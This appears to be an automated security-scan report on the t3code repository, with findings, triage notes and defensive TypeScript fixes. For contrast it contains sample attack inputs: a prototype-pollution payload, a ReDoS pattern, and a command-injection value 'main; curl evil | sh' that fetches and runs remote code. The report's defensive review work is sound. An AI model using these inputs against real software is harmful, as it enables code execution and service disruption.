
pingdotgg/t3code

https://github.com/pingdotgg/t3code · lang: typescript · LOC: · source: both

Quality
81.3
Grade A-
Security
100.0
Findings
69
1 critical · 26 high
Status
completed
May 18, 2026 14:48
critical: 1 · high: 26 · medium: 10 · low: 15 · info: 17
Top rules by occurrence
Rule · Severity · Count
AIC003 Duplicated implementation block across source files · low · 14
SEC045 eval()/exec() on stored or user-supplied data · medium · 3
MINED045 Ts Non Null Assertion · info · 3
SEC040 innerHTML XSS — template literal with server-supplied data · high · 3
MINED054 Ts As Any · info · 3
MINED044 Js Console Log Prod · info · 3
MINED058 React Dangerously Set Html · info · 3
SEC114 path.join / Path() on user-controlled segment without conta… · high · 3
SEC085 JS: child_process.exec with non-literal · high · 3
MINED027 React State Array Mutation · high · 3
First 69 findings (severity-sorted)
critical MINED019 Ssti Jinja From String CWE-94
apps/desktop/src/electron/ElectronMenu.ts:145 · conf 1.00
[MINED019] Ssti Jinja From String: jinja2.Environment().from_string(user_input) — full RCE via templates.
Triage note: the rule text describes the Python jinja2 API, but the flagged file is TypeScript (Electron menu code). Confirm manually that a template engine is actually fed user input here before counting this as the scan's one critical finding.
high JRN009 Secret-like setting is echoed into a password input value
apps/web/src/components/desktop/SshPasswordPromptDialog.tsx:191 · conf 0.83
Secret-like setting is echoed into a password input value
high MINED027 React State Array Mutation CWE-682
apps/server/integration/TestProviderAdapter.integration.ts:298 · conf 1.00
[MINED027] React State Array Mutation: state.X.push/splice/sort followed by setState — React skips re-render on mutated reference.
high MINED027 React State Array Mutation CWE-682
apps/server/src/processRunner.ts:174 · conf 1.00
[MINED027] React State Array Mutation: state.X.push/splice/sort followed by setState — React skips re-render on mutated reference.
high MINED027 React State Array Mutation CWE-682
apps/server/src/provider/Layers/ClaudeAdapter.ts:1143 · conf 1.00
[MINED027] React State Array Mutation: state.X.push/splice/sort followed by setState — React skips re-render on mutated reference.
Triage note: all three MINED027 hits are under apps/server/ (an integration test, the process runner and a provider adapter), not React component code. Confirm that the flagged push/splice/sort actually touches React state before counting them; pattern matches on server-side array mutation are likely false positives.
high SEC013 Path Traversal — User Input in File Path
apps/server/src/ws.ts:1106 · conf 0.80
[SEC013] Path Traversal — User Input in File Path: User-controlled input used in file path without sanitization. Allows reading arbitrary files.
high SEC013 Path Traversal — User Input in File Path
apps/web/src/components/ChatView.tsx:1928 · conf 0.80
[SEC013] Path Traversal — User Input in File Path: User-controlled input used in file path without sanitization. Allows reading arbitrary files.
high SEC013 Path Traversal — User Input in File Path
apps/web/src/environmentApi.ts:11 · conf 0.80
[SEC013] Path Traversal — User Input in File Path: User-controlled input used in file path without sanitization. Allows reading arbitrary files.
high SEC029 Server-Side Request Forgery (SSRF) — outbound HTTP from user input
apps/desktop/scripts/dev-electron.mjs:13 · conf 1.00
[SEC029] Server-Side Request Forgery (SSRF) — outbound HTTP from user input: Outbound HTTP request to a user-controlled URL without allowlist validation. Attackers can probe internal services (169.25…
high SEC029 Server-Side Request Forgery (SSRF) — outbound HTTP from user input
apps/desktop/src/backend/DesktopBackendManager.ts:183 · conf 1.00
[SEC029] Server-Side Request Forgery (SSRF) — outbound HTTP from user input: Outbound HTTP request to a user-controlled URL without allowlist validation. Attackers can probe internal services (169.25…
high SEC029 Server-Side Request Forgery (SSRF) — outbound HTTP from user input
apps/desktop/src/backend/DesktopServerExposure.ts:83 · conf 1.00
[SEC029] Server-Side Request Forgery (SSRF) — outbound HTTP from user input: Outbound HTTP request to a user-controlled URL without allowlist validation. Attackers can probe internal services (169.25…
high SEC033 Prototype Pollution — unfiltered merge of user object
apps/server/src/provider/Layers/ProviderRegistry.ts:403 · conf 1.00
[SEC033] Prototype Pollution — unfiltered merge of user object: Merging user-controlled object into a target without filtering `__proto__`/`constructor`/`prototype` keys lets attackers inject propert…
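The SEC033 description names the keys to filter but not why an unfiltered recursive merge reaches `Object.prototype`. The following is an added example, not code from t3code: `naiveMerge` is the flagged pattern, `safeMerge` the hardened form, and `demo()` runs both against a constructed payload and reports whether the global prototype was polluted (cleaning up afterwards). The payload and the `Dict` type are assumptions for the example.

```typescript
type Dict = Record<string, unknown>;

const FORBIDDEN_KEYS = new Set(["__proto__", "constructor", "prototype"]);

function isPlainObject(v: unknown): v is Dict {
  return typeof v === "object" && v !== null && !Array.isArray(v);
}

// The pattern SEC033 flags: recursive merge that trusts every key in `source`.
// For key "__proto__", `target[key]` reads the inherited accessor and returns
// Object.prototype, so the recursion writes attacker keys onto every object.
export function naiveMerge(target: Dict, source: Dict): Dict {
  for (const key of Object.keys(source)) {
    const s = source[key];
    const t = target[key];
    if (isPlainObject(s) && isPlainObject(t)) naiveMerge(t, s);
    else target[key] = s;
  }
  return target;
}

// Hardened: drop the three dangerous keys, only descend into properties the
// target *owns*, and copy nested objects instead of aliasing the source.
export function safeMerge(target: Dict, source: Dict): Dict {
  for (const key of Object.keys(source)) {
    if (FORBIDDEN_KEYS.has(key)) continue;
    const s = source[key];
    const t = Object.prototype.hasOwnProperty.call(target, key) ? target[key] : undefined;
    if (isPlainObject(s) && isPlainObject(t)) safeMerge(t, s);
    else target[key] = isPlainObject(s) ? safeMerge({}, s) : s;
  }
  return target;
}

// Constructed attacker payload. JSON.parse creates an *own* "__proto__" key,
// which is why JSON-shaped input is the usual carrier for this attack.
export const PAYLOAD = JSON.parse('{"__proto__":{"polluted":true},"name":"x"}') as Dict;

export function demo(): { naive: boolean; safe: boolean } {
  const probe = (): boolean => ({} as Dict).polluted === true; // fresh object, no own keys
  naiveMerge({}, PAYLOAD);
  const naive = probe();
  delete (Object.prototype as unknown as Dict).polluted; // undo the global damage
  safeMerge({}, PAYLOAD);
  const safe = probe();
  return { naive, safe };
}
```

When reviewing the flagged ProviderRegistry merge, the question to answer is whether the source object can come from outside the process (config file, RPC message, provider response); if it can, `Object.create(null)` targets or a schema validator in front of the merge are the usual belt-and-braces additions.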
high SEC038 HTTP Request Smuggling Risk — TE/CL mismatch
apps/server/src/auth/http.ts:63 · conf 1.00
[SEC038] HTTP Request Smuggling Risk — TE/CL mismatch: HTTP Request Smuggling (HRS) abuses parser disagreement between front-end and back-end servers about request boundaries when Transfer-Encoding a…
high SEC040 innerHTML XSS — template literal with server-supplied data
apps/server/src/keybindings.ts:431 · conf 1.00
[SEC040] innerHTML XSS — template literal with server-supplied data: Setting .innerHTML with a template literal that interpolates server-supplied or user-supplied data is the canonical stored/reflect…
high SEC040 innerHTML XSS — template literal with server-supplied data
apps/server/src/persistence/Migrations.ts:129 · conf 1.00
[SEC040] innerHTML XSS — template literal with server-supplied data: Setting .innerHTML with a template literal that interpolates server-supplied or user-supplied data is the canonical stored/reflect…
high SEC040 innerHTML XSS — template literal with server-supplied data
apps/server/src/process/externalLauncher.ts:334 · conf 1.00
[SEC040] innerHTML XSS — template literal with server-supplied data: Setting .innerHTML with a template literal that interpolates server-supplied or user-supplied data is the canonical stored/reflect…
Triage note: all three SEC040 hits are under apps/server/ (keybindings, persistence migrations, process launcher), where there is no DOM to assign innerHTML on. Confirm what the matched template literal actually builds before treating these as XSS; the web-side dangerouslySetInnerHTML findings below are the more plausible XSS surface.
high SEC083 JS: new RegExp() with non-literal
apps/server/src/provider/Layers/CodexSessionRuntime.ts:49 · conf 1.00
[SEC083] JS: new RegExp() with non-literal: new RegExp(<variable>) — variable input can craft a ReDoS pattern. Ported from eslint-plugin-security detect-non-literal-regexp (Apache-2.0).
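SEC083 fires on `new RegExp(variable)` because attacker-controlled text is compiled into a pattern, and a pattern such as `(a+)+$` backtracks exponentially. The added example below (not t3code's code) shows the two standard answers: escape the text so it matches literally, or avoid building a RegExp at all when a substring test is what the caller wants. The length cap and the `i` default are assumptions for the example; the escape set is the ECMAScript metacharacter set and is valid with and without the `u` flag.

```typescript
const MAX_PATTERN_LENGTH = 256; // hypothetical cap so input length bounds matching cost

// Escape every ECMAScript regex metacharacter so `s` matches itself and nothing else.
export function escapeRegExp(s: string): string {
  return s.replace(/[.*+?^${}()|[\]\\]/g, "\\$&");
}

// Build a RegExp from user text that can only ever match that text literally.
export function literalMatcher(userText: string, flags = "i"): RegExp {
  if (userText.length > MAX_PATTERN_LENGTH) {
    throw new Error("search text too long");
  }
  return new RegExp(escapeRegExp(userText), flags);
}

// Often the right fix is no RegExp at all: a plain substring test runs in linear time
// on any input and has no pattern to abuse.
export function containsLiteral(haystack: string, needle: string): boolean {
  return haystack.toLowerCase().includes(needle.toLowerCase());
}

// What the rule flags, kept for contrast only; never call with untrusted input.
// new RegExp("(a+)+$").test("a".repeat(30) + "b") does not return in useful time.
export function unsafeMatcher(userPattern: string): RegExp {
  return new RegExp(userPattern);
}
```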
high SEC085 JS: child_process.exec with non-literal
apps/server/src/cli/config.ts:410 · conf 1.00
[SEC085] JS: child_process.exec with non-literal: child_process.exec with user-derived input enables command injection. Ported from eslint-plugin-security detect-child-process (Apache-2.0).
high SEC085 JS: child_process.exec with non-literal
apps/server/src/diagnostics/ProcessDiagnostics.ts:85 · conf 1.00
[SEC085] JS: child_process.exec with non-literal: child_process.exec with user-derived input enables command injection. Ported from eslint-plugin-security detect-child-process (Apache-2.0).
high SEC085 JS: child_process.exec with non-literal
apps/server/src/git/GitManager.ts:153 · conf 1.00
[SEC085] JS: child_process.exec with non-literal: child_process.exec with user-derived input enables command injection. Ported from eslint-plugin-security detect-child-process (Apache-2.0).
high SEC100 CORS permissive Access-Control-Allow-Origin: *
apps/server/src/httpCors.ts:10 · conf 1.00
[SEC100] CORS permissive Access-Control-Allow-Origin: *: Permissive CORS policy (`*` origin) allows any website to make authenticated cross-origin requests. Especially dangerous when combined with `A…
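SEC100 flags the wildcard origin in apps/server/src/httpCors.ts. The fix is an exact-match allowlist whose validated value is echoed back, with `Vary: Origin` so shared caches do not serve one origin's response to another. The following is an added example, not the project's own httpCors implementation; the allowlist contents are assumptions for the example.

```typescript
// Hypothetical allowlist for the example. Origins are compared as exact strings
// (scheme + host + port), never by prefix, suffix or regex.
export const ALLOWED_ORIGINS: ReadonlySet<string> = new Set([
  "https://app.example.com",
  "http://localhost:5173",
]);

export function corsHeadersFor(
  origin: string | undefined,
  allow: ReadonlySet<string> = ALLOWED_ORIGINS,
): Record<string, string> | null {
  // No Origin header (same-origin or non-browser client), the literal "null" origin
  // (sandboxed iframes, file://) and anything not allowlisted get no CORS headers at all,
  // so the browser blocks the cross-origin read.
  if (!origin || origin === "null" || !allow.has(origin)) return null;
  return {
    "Access-Control-Allow-Origin": origin,         // the validated origin, never "*"
    "Access-Control-Allow-Credentials": "true",     // only meaningful with a specific origin
    "Vary": "Origin",                               // caches must key the response on Origin
    "Access-Control-Allow-Methods": "GET, POST, OPTIONS",
    "Access-Control-Allow-Headers": "Content-Type, Authorization",
    "Access-Control-Max-Age": "600",
  };
}

// The pattern SEC100 flags, for contrast: every site on the web may read the response.
export const PERMISSIVE_CORS: Record<string, string> = {
  "Access-Control-Allow-Origin": "*",
};
```

Reflecting an arbitrary incoming `Origin` header together with `Allow-Credentials: true` is the variant that turns a permissive policy into cross-origin credentialed reads; the allowlist check above is what separates "echo the origin" from "echo any origin".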
high SEC114 path.join / Path() on user-controlled segment without containment check
apps/desktop/src/app/DesktopEnvironment.ts:155 · conf 1.00
[SEC114] path.join / Path() on user-controlled segment without containment check: filepath.Clean / path.Join on attacker-supplied segments does NOT prevent escape from the base directory. `../../../e…
high SEC114 path.join / Path() on user-controlled segment without containment check
apps/desktop/src/electron/ElectronProtocol.ts:125 · conf 1.00
[SEC114] path.join / Path() on user-controlled segment without containment check: filepath.Clean / path.Join on attacker-supplied segments does NOT prevent escape from the base directory. `../../../e…
high SEC114 path.join / Path() on user-controlled segment without containment check
apps/server/src/attachmentPaths.ts:23 · conf 1.00
[SEC114] path.join / Path() on user-controlled segment without containment check: filepath.Clean / path.Join on attacker-supplied segments does NOT prevent escape from the base directory. `../../../e…
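Both SEC013 (apps/server/src/ws.ts, ChatView.tsx, environmentApi.ts) and SEC114 (DesktopEnvironment.ts, ElectronProtocol.ts, attachmentPaths.ts) come down to the same point: `path.join` and `path.resolve` normalise `..` but do not keep the result inside the base directory, and an absolute segment replaces the base outright. The following is an added example, not t3code's attachment-path code, showing the containment check a practitioner would want; `ATTACHMENT_ROOT` is a hypothetical directory. POSIX semantics are used explicitly so the result is the same on every platform.

```typescript
import * as path from "node:path";

// Hypothetical attachment root used by the example.
export const ATTACHMENT_ROOT = "/srv/t3code/attachments";

// The pattern SEC114 flags: join() normalises "..", it does not contain the result.
export function unsafeJoin(base: string, userSegment: string): string {
  return path.posix.join(base, userSegment);
}

// Resolve `userSegment` beneath `base` and return the absolute path only if it
// stays strictly inside `base`; otherwise return null.
export function resolveWithin(base: string, userSegment: string): string | null {
  if (userSegment.includes("\0")) return null;        // NUL bytes truncate paths in libc
  const root = path.posix.resolve(base);
  const target = path.posix.resolve(root, userSegment); // absolute segment replaces root here
  const rel = path.posix.relative(root, target);
  // "" means target === root (a directory, not a file), ".." / "../x" mean escape,
  // an absolute rel means different roots. "..name" is a legitimate file name and passes.
  if (rel === "" || rel === ".." || rel.startsWith("../") || path.posix.isAbsolute(rel)) {
    return null;
  }
  return target;
}
```

Two things this check does not cover: symlinks inside the base that point outside it (resolve with `fs.realpath` before comparing if the base can contain user-created links), and Windows, where backslashes and drive letters mean `path.win32` plus normalisation is needed instead of `path.posix`.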
high SEC128 Async function without await — fire-and-forget Promise (AI mistake)
apps/desktop/scripts/wait-for-resources.mjs:29 · conf 1.00
[SEC128] Async function without await — fire-and-forget Promise (AI mistake): Async call invoked without `await` returns an unhandled Promise. The outer function resolves before the inner work comple…
high SEC128 Async function without await — fire-and-forget Promise (AI mistake)
apps/desktop/src/electron/ElectronProtocol.ts:220 · conf 1.00
[SEC128] Async function without await — fire-and-forget Promise (AI mistake): Async call invoked without `await` returns an unhandled Promise. The outer function resolves before the inner work comple…
high SEC128 Async function without await — fire-and-forget Promise (AI mistake)
apps/desktop/src/electron/ElectronWindow.ts:118 · conf 1.00
[SEC128] Async function without await — fire-and-forget Promise (AI mistake): Async call invoked without `await` returns an unhandled Promise. The outer function resolves before the inner work comple…
medium AGT016 Codex session log reader may expose prompts or tool-call content
apps/server/src/provider/Layers/CodexAdapter.ts:2 · conf 0.73
Codex session log reader may expose prompts or tool-call content
medium ERR002 Empty Catch Block
apps/web/src/components/KeybindingsToast.browser.tsx:596 · conf 1.00
[ERR002] Empty Catch Block: Empty catch blocks hide errors.
medium ERR002 Empty Catch Block
apps/web/src/components/settings/SettingsPanels.browser.tsx:491 · conf 1.00
[ERR002] Empty Catch Block: Empty catch blocks hide errors.
medium SEC031 Catastrophic Backtracking Regex (ReDoS)
packages/shared/src/git.ts:14 · conf 1.00
[SEC031] Catastrophic Backtracking Regex (ReDoS): Regex contains nested quantifiers like `(a+)+` or quantified alternation with overlapping branches. On adversarial input these patterns exhibit expon…
medium SEC041 Tabnabbing — target="_blank" without rel="noopener noreferrer"
apps/web/src/localApi.ts:63 · conf 1.00
[SEC041] Tabnabbing — target="_blank" without rel="noopener noreferrer": <a target="_blank"> without rel="noopener noreferrer" leaks window.opener to the opened page. The opened page can then run win…
medium SEC045 eval()/exec() on stored or user-supplied data
apps/server/src/cli/config.ts:410 · conf 1.00
[SEC045] eval()/exec() on stored or user-supplied data: eval() and exec() on data — even admin-stored data — is a lateral-movement vector after any one credential compromise. Sandboxes (__builtins__ …
medium SEC045 eval()/exec() on stored or user-supplied data
apps/server/src/diagnostics/ProcessDiagnostics.ts:85 · conf 1.00
[SEC045] eval()/exec() on stored or user-supplied data: eval() and exec() on data — even admin-stored data — is a lateral-movement vector after any one credential compromise. Sandboxes (__builtins__ …
medium SEC045 eval()/exec() on stored or user-supplied data
apps/server/src/git/GitManager.ts:153 · conf 1.00
[SEC045] eval()/exec() on stored or user-supplied data: eval() and exec() on data — even admin-stored data — is a lateral-movement vector after any one credential compromise. Sandboxes (__builtins__ …
Triage note: the rule text is written for Python (`__builtins__`), and the three SEC045 locations are exactly the three SEC085 child_process.exec locations (config.ts:410, ProcessDiagnostics.ts:85, GitManager.ts:153). These are most likely the same exec() calls counted under two rules rather than separate eval() usage; triage them together as command-injection candidates.
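The SEC085 findings (and the SEC045 findings at the same three locations) are about `child_process.exec`, which hands a single string to a shell, so any `;`, `|` or `$(...)` in interpolated data becomes syntax. The hardened form is `execFile` with an argv array plus validation of the one argument that is still attacker-shaped. The following is an added example, not the project's GitManager code; the ref policy (`SAFE_REF`) and the `gitLog` helper are assumptions for the example.

```typescript
import { execFileSync } from "node:child_process";

// Hypothetical ref policy: must start with an alphanumeric (so it can never be parsed
// as an option), and may contain only characters git refs normally use. No whitespace.
const SAFE_REF = /^[A-Za-z0-9][A-Za-z0-9._\/-]{0,254}$/;

// The pattern SEC085 flags, kept only for contrast; never pass this to exec().
// With ref = "main; curl evil | sh" the shell runs curl.
export function unsafeCommand(ref: string): string {
  return `git log --oneline ${ref}`;
}

// Build argv for execFile. "--" terminates option parsing, so even a ref that
// git might otherwise read as an option (e.g. "--output=...") is inert.
export function gitLogArgs(ref: string, maxCount = 20): string[] {
  if (!SAFE_REF.test(ref)) {
    throw new Error(`refusing unsafe ref: ${JSON.stringify(ref)}`);
  }
  if (!Number.isInteger(maxCount) || maxCount < 1 || maxCount > 1000) {
    throw new Error("maxCount out of range");
  }
  return ["log", "--oneline", `--max-count=${maxCount}`, ref, "--"];
}

// execFile: no shell is involved, argv is passed verbatim to git, so shell
// metacharacters in `ref` are just characters (and SAFE_REF rejects them anyway).
export function gitLog(cwd: string, ref: string): string {
  return execFileSync("git", gitLogArgs(ref), { cwd, encoding: "utf8", timeout: 10_000 });
}
```

The validation step matters even with `execFile`: a shell-free spawn stops command injection, but argument injection (an attacker-supplied value that the program itself interprets as an option) is only stopped by refusing leading dashes and using `--`.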
medium SEC087 JS: weak Math.random for crypto
apps/web/src/components/ComposerPromptEditor.tsx:78 · conf 1.00
[SEC087] JS: weak Math.random for crypto: Math.random() is not cryptographically secure; using it for tokens/keys/nonces is predictable. Ported from gosec G404 / eslint detect-pseudoRandomBytes conce…
medium SEC087 JS: weak Math.random for crypto
apps/web/src/components/ui/sidebar.tsx:894 · conf 1.00
[SEC087] JS: weak Math.random for crypto: Math.random() is not cryptographically secure; using it for tokens/keys/nonces is predictable. Ported from gosec G404 / eslint detect-pseudoRandomBytes conce…
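Both SEC087 hits are in UI components (ComposerPromptEditor, sidebar), where `Math.random()` is commonly used for element ids or list keys; that is harmless, and the rule only matters if the value ends up gating access (session token, invite code, CSRF nonce). The added example below, not t3code's code, puts the flagged pattern beside the CSPRNG versions a practitioner would substitute when the value is a secret, and adds the constant-time comparison that goes with it. In browser code the equivalents are `crypto.getRandomValues` and `crypto.randomUUID`.

```typescript
import { randomBytes, randomInt, randomUUID, timingSafeEqual } from "node:crypto";

// What SEC087 flags: Math.random() seeds from a small state that an observer of a
// few outputs can recover, so tokens built this way are guessable.
export function weakToken(length = 16): string {
  let out = "";
  for (let i = 0; i < length; i++) out += Math.floor(Math.random() * 36).toString(36);
  return out;
}

// Hardened: CSPRNG bytes with a fixed entropy size (16 bytes = 128 bits), URL-safe encoding.
export function strongToken(bytes = 16): string {
  return randomBytes(bytes).toString("base64url");
}

// Uniform integer in [0, max) without the modulo bias of `bytes[0] % max`.
export function strongIndex(max: number): number {
  return randomInt(max);
}

// Version-4 UUID from the CSPRNG; fine as an unguessable identifier.
export function strongId(): string {
  return randomUUID();
}

// Compare a presented token against the stored one in constant time. The length
// check is required because timingSafeEqual throws on unequal buffer sizes.
export function verifyToken(presented: string, expected: string): boolean {
  const a = Buffer.from(presented, "utf8");
  const b = Buffer.from(expected, "utf8");
  if (a.length !== b.length) return false;
  return timingSafeEqual(a, b);
}
```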
low AIC003 Duplicated implementation block across source files
apps/server/src/persistence/Layers/ProjectionTurns.ts:50 · conf 0.86
Duplicated implementation block across source files
low AIC003 Duplicated implementation block across source files
apps/server/src/provider/acp/AcpRuntimeModel.ts:222 · conf 0.86
Duplicated implementation block across source files
low AIC003 Duplicated implementation block across source files
apps/server/src/provider/Drivers/CodexDriver.ts:40 · conf 0.86
Duplicated implementation block across source files
low AIC003 Duplicated implementation block across source files
apps/server/src/provider/Drivers/CursorDriver.ts:46 · conf 0.86
Duplicated implementation block across source files
low AIC003 Duplicated implementation block across source files
apps/server/src/provider/Drivers/CursorDriver.ts:136 · conf 0.86
Duplicated implementation block across source files
low AIC003 Duplicated implementation block across source files
apps/server/src/provider/Drivers/OpenCodeDriver.ts:21 · conf 0.86
Duplicated implementation block across source files
low AIC003 Duplicated implementation block across source files
apps/server/src/provider/Drivers/OpenCodeDriver.ts:90 · conf 0.86
Duplicated implementation block across source files
low AIC003 Duplicated implementation block across source files
apps/server/src/provider/Drivers/OpenCodeDriver.ts:140 · conf 0.86
Duplicated implementation block across source files
low AIC003 Duplicated implementation block across source files
apps/server/src/sourceControl/GitLabSourceControlProvider.ts:28 · conf 0.86
Duplicated implementation block across source files
low AIC003 Duplicated implementation block across source files
apps/server/src/textGeneration/CodexTextGeneration.ts:21 · conf 0.86
Duplicated implementation block across source files
low AIC003 Duplicated implementation block across source files
apps/server/src/textGeneration/CursorTextGeneration.ts:56 · conf 0.86
Duplicated implementation block across source files
low AIC003 Duplicated implementation block across source files
apps/server/src/textGeneration/CursorTextGeneration.ts:237 · conf 0.86
Duplicated implementation block across source files
low AIC003 Duplicated implementation block across source files
apps/server/src/textGeneration/OpenCodeTextGeneration.ts:332 · conf 0.86
Duplicated implementation block across source files
low AIC003 Duplicated implementation block across source files
apps/web/src/components/ui/combobox.tsx:59 · conf 0.86
Duplicated implementation block across source files
low SEC132 String concat where the language has interpolation (AI style drift)
packages/ssh/src/tunnel.ts:204 · conf 1.00
[SEC132] String concat where the language has interpolation (AI style drift): String built by concatenation where the language has cleaner interpolation (Python f-strings since 3.6, JS template liter…
info MINED043 Http Not Https CWE-319
apps/desktop/src/backend/DesktopServerExposure.ts:118 · conf 1.00
[MINED043] Http Not Https: Hardcoded http:// (not localhost) for endpoints that handle credentials or data.
info MINED043 Http Not Https CWE-319
apps/desktop/src/backend/tailscaleEndpointProvider.ts:47 · conf 1.00
[MINED043] Http Not Https: Hardcoded http:// (not localhost) for endpoints that handle credentials or data.
info MINED043 Http Not Https CWE-319
apps/server/src/serverRuntimeStartup.ts:248 · conf 1.00
[MINED043] Http Not Https: Hardcoded http:// (not localhost) for endpoints that handle credentials or data.
info MINED044 Js Console Log Prod CWE-532
apps/desktop/scripts/electron-launcher.mjs:101 · conf 1.00
[MINED044] Js Console Log Prod: console.log left in code. Should be replaced with logger or removed.
info MINED044 Js Console Log Prod CWE-532
apps/server/src/cli/auth.ts:109 · conf 1.00
[MINED044] Js Console Log Prod: console.log left in code. Should be replaced with logger or removed.
info MINED044 Js Console Log Prod CWE-532
apps/server/src/cli/project.ts:284 · conf 1.00
[MINED044] Js Console Log Prod: console.log left in code. Should be replaced with logger or removed.
info MINED045 Ts Non Null Assertion CWE-476
apps/desktop/src/app/DesktopApp.ts:74 · conf 1.00
[MINED045] Ts Non Null Assertion: `x!` asserts the value is non-null, bypassing the compiler's null check; if the assumption is wrong it surfaces as a runtime TypeError.
info MINED045 Ts Non Null Assertion CWE-476
apps/desktop/src/app/DesktopLifecycle.ts:216 · conf 1.00
[MINED045] Ts Non Null Assertion: `x!` asserts the value is non-null, bypassing the compiler's null check; if the assumption is wrong it surfaces as a runtime TypeError.
info MINED045 Ts Non Null Assertion CWE-476
apps/desktop/src/settings/DesktopSavedEnvironments.ts:283 · conf 1.00
[MINED045] Ts Non Null Assertion: `x!` asserts the value is non-null, bypassing the compiler's null check; if the assumption is wrong it surfaces as a runtime TypeError.
info MINED049 Print Pii CWE-532
apps/server/src/cli/auth.ts:183 · conf 1.00
[MINED049] Print Pii: Logging password/token/email/ssn directly to stdout.
info MINED052 Ts Any Typed CWE-704
apps/web/src/rpc/wsRpcClient.ts:29 · conf 1.00
[MINED052] Ts Any Typed: `: any` used as a type annotation. Defeats TypeScript type safety.
info MINED054 Ts As Any CWE-704
apps/desktop/src/electron/ElectronApp.ts:51 · conf 1.00
[MINED054] Ts As Any: Casting to any (as any) bypasses type checking entirely.
info MINED054 Ts As Any CWE-704
apps/server/src/persistence/NodeSqliteClient.ts:126 · conf 1.00
[MINED054] Ts As Any: Casting to any (as any) bypasses type checking entirely.
info MINED054 Ts As Any CWE-704
apps/web/src/routeTree.gen.ts:30 · conf 1.00
[MINED054] Ts As Any: Casting to any (as any) bypasses type checking entirely.
info MINED058 React Dangerously Set Html CWE-79
apps/web/src/components/ChatMarkdown.tsx:218 · conf 1.00
[MINED058] React Dangerously Set Html: dangerouslySetInnerHTML bypasses React's JSX escaping. Sanitize with DOMPurify first, or never use it with user data.
info MINED058 React Dangerously Set Html CWE-79
apps/web/src/components/chat/SkillInlineText.tsx:79 · conf 1.00
[MINED058] React Dangerously Set Html: dangerouslySetInnerHTML bypasses React's JSX escaping. Sanitize with DOMPurify first, or never use it with user data.
info MINED058 React Dangerously Set Html CWE-79
apps/web/src/components/ComposerPromptEditor.tsx:258 · conf 1.00
[MINED058] React Dangerously Set Html: dangerouslySetInnerHTML bypasses React's JSX escaping. Sanitize with DOMPurify first, or never use it with user data.
